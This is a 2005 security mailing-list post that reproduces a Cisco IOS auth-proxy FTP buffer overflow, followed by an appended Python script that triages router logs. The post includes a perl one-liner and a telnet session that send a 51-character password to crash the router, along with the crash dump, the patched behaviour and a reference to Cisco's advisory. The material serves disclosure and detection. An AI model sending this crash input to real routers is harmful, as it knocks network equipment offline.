[Darklab] IOS auth_proxy b0f details

Markus markus at brennercom.net
Thu Oct 6 12:17:10 CEST 2005


Hi list,

The testbed is a Cisco 1841 running IOS 12.3(8)T8, which
seems to be vulnerable. The problem lies in the password
buffer: if you send a pass with 51 chars,
the router will crash.

perl -e 'print "pass "; print "A" x 51; print "@ \n";'

Router(config)#ip auth-proxy name darklab ftp list darklab_acl
Router(config)#ip access-list extended darklab_acl
Router(config-ext-nacl)#permit ip host 10.0.0.2 any
Router(config-ext-nacl)#int f0/0
Router(config-if)#ip auth-proxy darklab
Router(config-if)#^Z
Router#show ip auth-proxy configuration 
Authentication global cache time is 60 minutes
Authentication global absolute time is 0 minutes
Authentication Proxy Watch-list is disabled

Authentication Proxy Rule Configuration
 Auth-proxy name darklab
    ftp list darklab_acl auth-cache-time 60 minute

Looks good, let's open some debug:

Router#debug ip auth-proxy ftp
AUTH-PROXY FTP debugging is on
Router#debug ip auth-proxy det
AUTH-PROXY Detailed debugging is on


% telnet 192.168.0.2 21
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
220 FTP Authentication Proxy.
user u at h
331 Password Required.
pass AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@


Router#
*Oct  6 09:43:57.011: AUTH-PROXY:proto_flag=1, dstport_index=1
*Oct  6 09:43:57.011:  SYN SEQ 2491401850 LEN 0
*Oct  6 09:43:57.011: dst_addr 192.168.0.2 src_addr 10.0.0.2 dst_port 21 src_port 32832
*Oct  6 09:43:57.011: AUTH-PROXY:auth_proxy_half_open_count++ 1
*Oct  6 09:43:57.011: AUTH-PROXY:proto_flag=1, dstport_index=1
*Oct  6 09:43:57.011:  ACK 23487221 SEQ 2491401851 LEN 0
*Oct  6 09:43:57.011: dst_addr 192.168.0.2 src_addr 10.0.0.2 dst_port 21 src_port 32832
*Oct  6 09:43:57.011: clientport 32832 state 0
*Oct  6 09:43:57.015: AUTH-PROXY:incremented proxy_proc_count=1
*Oct  6 09:43:57.015: AUTH-PROXY-FTP:Getting command from ftp client
*Oct  6 09:43:57.015: AUTH-PROXY:proto_flag=1, dstport_index=1
*Oct  6 09:43:57.015:  ACK 23487252 SEQ 2491401851 LEN 0
*Oct  6 09:43:57.015: dst_addr 192.168.0.2 src_addr 10.0.0.2 dst_port 21 src_port 32832
*Oct  6 09:43:57.015: clientport 32832 state 0
*Oct  6 09:44:01.103: AUTH-PROXY:proto_flag=1, dstport_index=1
*Oct  6 09:44:01.103:  PSH ACK 23487252 SEQ 2491401851 LEN 10
*Oct  6 09:44:01.103: dst_addr 192.168.0.2 src_addr 10.0.0.2 dst_port 21 src_port 32832
*Oct  6 09:44:01.103: clientport 32832 state 0
*Oct  6 09:44:01.103: AUTH-PROXY:proto_flag=1, dstport_index=1
*Oct  6 09:44:01.103:  ACK 23487277 SEQ 2491401861 LEN 0
*Oct  6 09:44:01.103: dst_addr 192.168.0.2 src_addr 10.0.0.2 dst_port 21 src_port 32832
*Oct  6 09:44:01.103: clientport 32832 state 0

Unexpected exception, CPU signal 10, PC = 0x61725BE0


-Traceback= 61725BE0 606844C4 
$0 : 00000000, AT : 62630000, v0 : 68000000, v1 : FB2ED57A
a0 : 00000000, a1 : 632ED4DA, a2 : FB2ED579, a3 : 68000001
t0 : 632ED580, t1 : 00000001, t2 : FFFFFFFF, t3 : 0000000A
t4 : 604A4170, t5 : 00000D8F, t6 : 00000000, t7 : 00000007
s0 : 632ED4D3, s1 : 00000038, s2 : 00000001, s3 : 632ED9B8
s4 : 62CBDC50, s5 : 632ED4D8, s6 : 632ED510, s7 : 632ED4A0
t8 : E7400384, t9 : 00000000, k0 : 63277604, k1 : 606844C4
gp : 626351A0, sp : 632ED358, s8 : 632ED468, ra : 606844C4
EPC  : 61725BE0, ErrorEPC : BFC05F1C, SREG     : 3401FF03
MDLO : 00007530, MDHI     : 00000000, BadVaddr : 68000000
Cause 0000000C (Code 0x3): TLB (store) exception
Process watchdog registers:
$0 : 00000000, AT : 62630000, v0 : 6729C880, v1 : FC050CFA
a0 : 00000000, a1 : 632ED4DA, a2 : FC050CF9, a3 : 6729C881
t0 : 632ED580, t1 : 00000001, t2 : FFFFFFFF, t3 : 0000000A
t4 : 604A4170, t5 : 00000D8F, t6 : 00000000, t7 : 00000007
s0 : 632ED4D3, s1 : 00000038, s2 : 00000001, s3 : 632ED9B8
s4 : 62CBDC50, s5 : 632ED4D8, s6 : 632ED510, s7 : 632ED4A0
t8 : E7400384, t9 : 00000000, k0 : 63277604, k1 : 61725BE4
gp : 626351A0, sp : 632ED358, s8 : 632ED468, ra : 606844C4
EPC : 61725BE4, SP : 632ED358, forkx : 63277604

Writing crashinfo to flash:crashinfo_20051006-094409

---etc---etc---etc

here we go :-)

Router#sh flash:
-#- --length-- -----date/time------ path
1     15205844 Oct 06 2005 08:17:38 c1841-advsecurityk9-mz.123-8.T8.bin
2       166061 Oct 06 2005 09:44:08 crashinfo_20051006-094409

A patched IOS limits user/pass to 50 chars,
"debug ip auth-proxy ftp" shows the following:

*Oct  6 07:54:42.307: AUTH-PROXY-FTP:Username received greater than allowed[50]
*Oct  6 07:54:42.307: AUTH-PROXY-FTP:Exit daemon due to error
*Oct  6 07:54:42.307: AUTH-PROXY:decremented proxy_proc_count=0


Reference:
http://www.cisco.com/warp/public/707/cisco-sa-20050907-auth_proxy.shtml

cheers

Markus

-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: crashinfo_20051006-094409
Url: http://lists.darklab.org/pipermail/darklab/attachments/20051006/a0f37064/attachment.diff 
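
Added example (not part of the original post, and not Cisco code): a small Python triage pass over router console/debug output that picks out the two outcomes shown above, the crash on an unpatched image and the "greater than allowed[50]" rejection on a patched one, and tags each with the last auth-proxy client address seen. The function name, field names and sample lines are constructed for illustration; the samples reuse the log format quoted in the post, unwrapped.

```python
import re

# Patterns taken from the console/debug output quoted in the post.
SRC = re.compile(r"dst_addr (\S+) src_addr (\S+) dst_port (\d+) src_port (\d+)")
CRASH = re.compile(r"Unexpected exception, CPU signal (\d+), PC = (0x[0-9A-Fa-f]+)")
CRASHINFO = re.compile(r"Writing crashinfo to (\S+)")
# Only the "Username" form appears in the post; \w+ also accepting another
# field name in the same wording is an assumption.
REJECT = re.compile(r"AUTH-PROXY-FTP:(\w+) received greater than allowed\[(\d+)\]")

# Constructed samples: unwrapped lines in the format shown in the post.
UNPATCHED = [
    "*Oct  6 09:44:01.103: dst_addr 192.168.0.2 src_addr 10.0.0.2 dst_port 21 src_port 32832",
    "Unexpected exception, CPU signal 10, PC = 0x61725BE0",
    "Writing crashinfo to flash:crashinfo_20051006-094409",
    "Unexpected exception, CPU signal 10, PC = 0x61725BE0",
]
PATCHED = [
    "*Oct  6 07:54:42.300: dst_addr 192.168.0.2 src_addr 10.0.0.2 dst_port 21 src_port 32833",
    "*Oct  6 07:54:42.307: AUTH-PROXY-FTP:Username received greater than allowed[50]",
    "*Oct  6 07:54:42.307: AUTH-PROXY-FTP:Exit daemon due to error",
]

def triage(lines):
    """Return findings in log order, tagged with the last auth-proxy client seen."""
    findings, client = [], None
    for line in lines:
        last = findings[-1] if findings else None
        if m := SRC.search(line):
            client = m.group(2)
        elif m := REJECT.search(line):
            findings.append({"kind": "oversize_rejected", "field": m.group(1),
                             "limit": int(m.group(2)), "client": client})
        elif m := CRASH.search(line):
            if last and last["kind"] == "crash" and last["pc"] == m.group(2):
                last["count"] += 1      # repeated dump of the same exception
            else:
                findings.append({"kind": "crash", "signal": int(m.group(1)),
                                 "pc": m.group(2), "client": client,
                                 "count": 1, "crashinfo": None})
        elif (m := CRASHINFO.search(line)) and last and last["kind"] == "crash":
            last["crashinfo"] = m.group(1)
    return findings

if __name__ == "__main__":
    for f in triage(UNPATCHED) + triage(PATCHED):
        print(f)
```

Feed it the router's logging buffer or syslog stream one line per list element; lines wrapped by a mail client, as in the post, have to be rejoined first.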